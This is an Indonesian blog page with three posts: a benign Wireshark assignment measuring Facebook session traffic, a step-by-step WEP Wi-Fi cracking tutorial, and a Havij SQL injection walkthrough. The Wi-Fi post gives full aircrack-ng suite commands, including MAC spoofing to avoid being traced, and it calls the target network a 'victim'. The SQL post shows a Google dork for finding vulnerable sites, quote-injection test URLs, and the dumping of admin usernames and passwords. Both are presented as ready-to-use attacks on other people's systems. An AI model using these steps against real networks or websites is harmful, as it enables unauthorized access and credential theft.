pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:
Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:
  1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
  2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?
langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
  1. pertama-tama buka aplikasi wireshark :)
  2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
  3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
  4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
    host www.facebook.com and host alamat.ip.komputer.anda
  5. Klik start, maka proses penyadapan akan segera dimulai
  6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
  7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
  8. hasil statistik sniffing paket data facebook
Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.
sekian postingan kali ini.
readmore »»  

Cara Hack Wifi Atau Wireless Password



Halo way, saya hari ini akan menjelaskan kepada anda cara untuk memecahkan Wifi atau sandi nirkabel hanya dalam 10 sampai 15 menit. Hari ini saya akan menjelaskan Cara Hack atau Crack Wifi Password. Hari hack akan didasarkan pada retak password enkripsi WEP. Jadi orang mengencangkan ikat pinggang Anda untuk baru hack dan mari kita mulai hack wifi. Saya juga memasukkan video di bawah posting. Jadi anda bisa membaca dan menonton ....

LANGKAH UNTUK HACK PASSWORD ATAU WIRELESS WIFI


1. Dapatkan CD Backtrack-Linux
. Backtrack Linux Live CD (Linux terbaik tersedia untuk hacker dengan lebih dari 2000 hacking tools built-in).
Download Backtrack Linux Live CD dari sini: http://www.backtrack-linux.org/downloads/

2. SCAN UNTUK MENDAPATKAN KORBAN


Dapatkan korban serangan itu adalah password yang ingin Anda hack atau crack.
Sekarang Masukkan Backtrack Linux CD ke dalam drive CD Anda dan memulainya. Setelah itu klik mulai pada kotak hitam di sudut kiri bawah untuk memuat sebuah "Konsole". Sekarang Anda harus mulai kartu Wifi. Untuk melakukannya ketik:
airmon-ng

Anda akan melihat nama kartu nirkabel Anda. (saya adalah bernama "ath0") Dari sini anda keluar, ganti nama kartu anda dengan "ath0". Sekarang ketik:
airmon-ng stop ath0

kemudian ketik:

ifconfig wifi0 down


kemudian ketik:


macchanger --mac 00:11:22:33:44:55 wifi0


kemudian ketik:

airmon-ng start wifi0

langkah-langkah di atas telah menjelaskan unt memalsukan diri dari dilacak. Pada langkah di atas kita spoofing MAC address kita, ini akan membuat kita tidak dapat ditemukan.

sekarang ketik:

airodump-ng ath0

Semua langkah di atas dalam satu screen shot:


Sekarang Anda akan melihat daftar jaringan nirkabel di Konsole. Beberapa akan memiliki sinyal yang lebih baik dari yang lain dan selalu nya ide yang baik untuk memilih satu yang memiliki kekuatan sinyal yang terbaik selain itu akan memakan waktu yang sangat besar untuk crack atau hack password atau Anda mungkin tidak dapat retak sama sekali.
Setelah Anda melihat daftar jaringan, sekarang pilih jaringan yang ingin Anda hack. Untuk membekukan layar airodump TAHAN tombol CNTRL dan Tekan C.
Sekarang Anda akan melihat sesuatu seperti ini:


3. MEMILIH JARINGAN UNTUK HACKING

Sekarang menemukan jaringan yang ingin Anda hack dan PASTIKAN bahwa ia mengatakan enkripsi untuk jaringan yang WEP. Jika tertulis WPA atau variasi WPA kemudian berpindah ... Anda masih dapat crack WPA dengan mundur dan beberapa alat lainnya tetapi adalah permainan bola seluruh lain dan Anda perlu menguasai WEP pertama.


Setelah Anda memutuskan jaringan, mencatat nomor saluran dan BSSID. BSSID akan terlihat seperti ini -

00:23:69:bb:2d:of


Jumlah Channel akan berada di bawah sebuah heading yang mengatakan "CH".
Seperti ditunjukkan dalam gambar ini:


Sekarang di Konsole jenis jendela yang sama:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


Sekarang di jendela yang sama jenis Konsole: Nama file dapat apa pun yang Anda inginkan. File ini adalah tempat di mana airodump akan menyimpan paket info yang Anda terima untuk kemudian retak. Anda bahkan tidak dimasukkan dalam ekstensi ... hanya memilih kata acak yang akan Anda ingat. Saya biasanya membuat saya "Ben" karena saya selalu bisa mengingatnya. Its hanya karena i love Ben10 .... hhahahahaha: D

Catatan: Jika Anda ingin retak lebih dari satu jaringan dalam sesi yang sama, Anda harus memiliki nama file yang berbeda untuk setiap satu atau itu tidak akan berhasil. Saya biasanya nama mereka sebagai ben1, ben2 dll

Setelah Anda mengetikkan perintah terakhir, layar airodump akan berubah dan mulai menunjukkan komputer Anda paket pertemuan. Anda juga akan melihat pos bertanda "IV" dengan nomor di bawahnya. Ini adalah singkatan untuk "Inisialisasi Vektor" tetapi secara umum semua ini berarti "paket dari info yang berisi karakter dari password." Setelah Anda mendapatkan minimal 5.000 IV ini, Anda dapat mencoba untuk memecahkan password. Aku sudah retak tepat beberapa di 5.000 dan yang lainnya telah mengambil alih 60.000. Ini tergantung pada berapa lama dan sulit mereka membuat password. Lebih sulit adalah paket password semakin Anda akan perlu untuk memecahkannya.

4. Cracking password WEP

Sekarang tinggalkan jendela ini Konsole dan berjalan dan membuka jendela Konsole 2.
Dalam tipe window:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

Ini akan mengirimkan beberapa perintah untuk router bahwa pada dasarnya itu adalah untuk mengaitkan komputer Anda meskipun Anda tidak resmi berhubungan dengan password. Jika perintah ini berhasil, Anda akan melihat sekitar 4 baris mencetak teks keluar dengan yang terakhir mengatakan sesuatu yang mirip dengan "Asosiasi :-) Sukses"
Jika ini terjadi, maka baik! Anda hampir ada.

Sekarang ketik:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0


Ini akan menghasilkan sekelompok teks dan kemudian Anda akan melihat baris mana komputer Anda adalah mengumpulkan segudang paket dan menunggu di ARP dan ACK. Jangan khawatir tentang apa artinya ini ... hanya tahu bahwa ini adalah tiket makan Anda. Sekarang Anda hanya duduk dan menunggu. Setelah komputer Anda akhirnya mengumpulkan sebuah permintaan ARP, ia akan mengirim kembali ke router dan mulai menghasilkan ratusan ARP dan ACK per detik. Kadang-kadang ini mulai terjadi dalam hitungan detik ... kadang-kadang Anda harus menunggu hingga beberapa menit. Hanya bersabar. Ketika akhirnya tidak terjadi, beralih kembali ke jendela pertama Konsole anda dan anda akan melihat nomor di bawah IV mulai meningkat pesat. Ini hebat! Ini berarti Anda hampir selesai! Bila jumlah ini mencapai SEDIKITNYA 5.000 maka Anda dapat mulai membobol password anda. Mungkin akan memakan waktu lebih dari ini, tetapi saya selalu memulai sandi saya cracking di 5.000 hanya jika mereka memiliki password yang benar-benar lemah.

Sekarang anda perlu membuka 3 dan jendela Konsole akhir. Hal ini akan berada di tempat kita sebenarnya crack password.
Sekarang ketik:

aircrack-ng -b (bssid) (filename)-01.cap


Ingat nama file yang dibuat sebelumnya? Tambang adalah "Ben". Jangan menempatkan spasi di antara itu dan-01.cap sini. Jenis sebagai Anda melihatnya. Jadi bagi saya, saya akan ketik wepkey-01.cap
Setelah Anda melakukan ini, Anda akan melihat api aircrack dan mulai crack password. biasanya Anda harus menunggu lebih seperti 10.000 hingga 20.000 IV sebelum akan retak. Jika hal ini terjadi, aircrack akan menguji apa yang Anda miliki sejauh ini dan kemudian akan mengatakan sesuatu seperti "tidak cukup IV Coba lagi di 10.000.."
JANGAN LAKUKAN APA PUN! Ini akan tetap berjalan ... itu hanya membiarkan Anda tahu bahwa itu ada di jeda sampai lebih IV berkumpul. Setelah Anda melewati tanda 10.000 maka secara otomatis akan menjalankan lagi dan mencoba untuk memecahkannya. Jika ini gagal maka akan mengatakan "tidak cukup IV Coba lagi di 15.000.." dan seterusnya sampai akhirnya mendapatkannya.

Jika Anda melakukan semuanya dengan benar sampai titik ini, sebelum terlalu lama Anda akan memiliki password! sekarang jika password tampak konyol, khawatir dont, itu akan tetap bekerja. beberapa password disimpan dalam format ASCII, dalam hal ini, aircrack akan menunjukkan kepada Anda apa karakter mereka ketik in untuk password mereka. Kadang-kadang, meskipun, password tersebut disimpan dalam format HEX dalam hal komputer akan menampilkan enkripsi HEX dari password. Tidak masalah dengan cara baik, karena Anda dapat mengetik di salah satu dan akan menghubungkan Anda ke jaringan.

Perhatikan, bahwa password akan selalu ditampilkan di aircrack dengan tanda titik setelah setiap 2 karakter. Jadi misalnya jika password adalah "rahasia", akan ditampilkan sebagai:

se:cr:et


Hal ini jelas akan menjadi format ASCII. Jika itu adalah HEX sandi terenkripsi itu adalah sesuatu seperti "0FKW9427VF" maka akan tetap ditampilkan sebagai:

0F:KW:94:27:VF



Hanya menghilangkan tanda titik dua dari password, boot kembali ke sistem operasi apa pun yang Anda gunakan, mencoba untuk terhubung ke jaringan dan ketik password tanpa titik dua dan presto! Anda berada di!

Ini mungkin tampak seperti banyak berurusan dengan jika Anda belum pernah melakukannya, tapi setelah mencoba beberapa berhasil, Anda akan menjadi sangat cepat dengan itu. Jika saya di dekat sebuah router WEP dienkripsi dengan sinyal yang baik, saya sering bisa memecahkan sandi hanya dalam beberapa menit.

Saya tidak bertanggung jawab atas apa yang Anda lakukan dengan informasi ini. Setiap kegiatan / berbahaya ilegal yang anda lakukan, jatuh sepenuhnya pada Anda karena ... teknis ... ini hanya bagi Anda untuk menguji keamanan jaringan Anda sendiri.
readmore »»  

Hack Website Menggunakan Tools Havij

Creadit By  :
[x] Alberto Karlos FTF


Thanks To :
[+] All Friend
[+] N3

Langkah pertama, cari dulu website yang akan dijadikan target. Buka google, ketik misalkan : inurl:index.php?id=

Setelah kita dapat web target, cek menggunakan tanda petik – '
Testing :

http://www.target.com.my/index.phpid=%271
http://www.target.com.my/index.php?id=-1


Website ternyata error, klo seperti itu berarti website vuln. Ok qta lanjutkan ke tahap selanjut’y. Buka Tools havij copas url web yg tadi sudah kita cek.






Gambar Terposting 
1. Setelah di copas URL’y lalu Klik icon Analyze. Tunggu sampai selesai. (Biarkan sampai status kembali I’m IDLE)
Kalo dagh selesai nanti tampilan’y akan seperti ini :


Gambar Terposting

2. Selanjut’y Klik icon Tables, tampilan’y seperti ini :

Gambar Terposting


3. lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :


Gambar TerpostingOK guys...udah keliatan tuwh nama2 dari database’y, tgl dipilih target yg ingin qta perkosa. Qta perkosa Database yg bernama Administrator aja. :D 

4. Klik DB Administrator lalu klik Get Tables, nanti akan keluar tables2’y seperti ini :

Gambar Terposting

 5. Next sekarang qta cari columns’y. Cara’y klik hasil yg keluar tadi beberapa columns yg keluar dari tables Administrator seperti ini : isdeleted,tingkat,password,user_name,id
Qta centang user_name and password’y saja lalu klik Get Data.
Ok guys selesai akhir’y password and user_name Admin dah nongol tuwh.


Gambar Terposting
 Tools ini memang cukup banyak fungsi’y, selain sql injection secara otomatic. Tools ini mempunyai banyak fitur lain’y antara lain untuk mencari halaman admin ato mencari password hash MD5.

Gambar Terposting

Cukup sampe sini aja yak, klo untuk mencari halaman admin’y ato MD5 silahkan di otak-atik sendiri aja. Cara’y mudah kok.

Download Tools Havij : My link
readmore »»  
//SEO SCRIPT POWERED BY www.tutorialblogspot.com